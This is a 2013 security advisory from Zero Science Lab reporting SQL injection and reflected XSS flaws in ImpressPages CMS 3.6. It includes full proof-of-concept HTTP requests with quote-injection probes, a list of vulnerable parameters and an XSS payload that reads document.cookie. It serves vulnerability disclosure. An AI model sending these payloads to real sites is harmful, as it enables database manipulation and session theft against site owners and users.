ImpressPages CMS 3.6 Cross Site Scripting / SQL Injection

`  
ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities  
  
  
Vendor: ImpressPages UAB  
Product web page: http://www.impresspages.org  
Affected version: 3.6  
  
Summary: ImpressPages CMS is an open source web content  
management system with revolutionary drag & drop interface.  
  
Desc: Input passed via several parameters is not properly  
sanitized before being returned to the user or used in SQL  
queries. This can be exploited to manipulate SQL queries by  
injecting arbitrary SQL code and HTML/script code in a user's  
browser session in context of an affected site.  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2  
PHP 5.4.7  
MySQL 5.5.25a  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2013-5157  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5157.php  
  
Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/  
  
  
  
12.10.2013  
  
--  
  
==================================  
  
SQL Injection: (pageId param)  
  
POST /impresspages/?cms_action=manage HTTP/1.1  
Host: localhost  
Proxy-Connection: keep-alive  
Content-Length: 124  
Accept: application/json, text/javascript, */*; q=0.01  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://localhost/impresspages/?cms_action=manage  
Accept-Encoding: gzip,deflate,sdch  
Accept-Language: en-US,en;q=0.8  
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1  
  
g=standard&m=content_management&a=getPageOptionsHtml&securityToken=c029f7293955df089676b78af8222d2a&pageId=64'&zoneName=menu1  
  
  
==================================  
  
SQL Injection: (language param)  
  
POST /impresspages/admin.php?module_id=436&action=export&security_token=381cb48be4ed7445a9e6303e64ae87ac HTTP/1.1  
Host: localhost  
Proxy-Connection: keep-alive  
Content-Length: 404  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Origin: http://localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybBHOjmAcICeilnDe  
Referer: http://localhost/impresspages/admin.php?module_id=436&security_token=381cb48be4ed7445a9e6303e64ae87ac  
Accept-Encoding: gzip,deflate,sdch  
Accept-Language: en-US,en;q=0.8  
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1  
  
------WebKitFormBoundarybBHOjmAcICeilnDe  
Content-Disposition: form-data; name="language"  
  
344'  
------WebKitFormBoundarybBHOjmAcICeilnDe  
Content-Disposition: form-data; name="spec_security_code"  
  
9f1ff00ea8fd9fd8f2d421ba5ec45a18  
------WebKitFormBoundarybBHOjmAcICeilnDe  
Content-Disposition: form-data; name="spec_rand_name"  
  
lib_php_form_standard_2_  
------WebKitFormBoundarybBHOjmAcICeilnDe--  
  
  
==================================  
  
Reflected XSS POST parameters:  
  
- files[0][file]  
- instanceId  
- pageOptions[buttonTitle]  
- pageOptions[createdOn]  
- pageOptions[description]  
- pageOptions[keywords]  
- pageOptions[lastModified]  
- pageOptions[layout]  
- pageOptions[pageTitle]  
- pageOptions[redirectURL]  
- pageOptions[rss]  
- pageOptions[type]  
- pageOptions[url]  
- pageOptions[visible]  
- revisionId  
- widgetName  
- pageSize[0]  
- page[0]  
- road[]  
  
  
==================================  
  
POST /impresspages/?cms_action=manage HTTP/1.1  
Host: localhost  
Proxy-Connection: keep-alive  
Content-Length: 155  
Accept: application/json, text/javascript, */*; q=0.01  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://localhost/impresspages/?cms_action=manage  
Accept-Encoding: gzip,deflate,sdch  
Accept-Language: en-US,en;q=0.8  
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1  
  
g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId=<img%20src%3da%20onerror%3dalert(document.cookie)>  
  
...  
  
`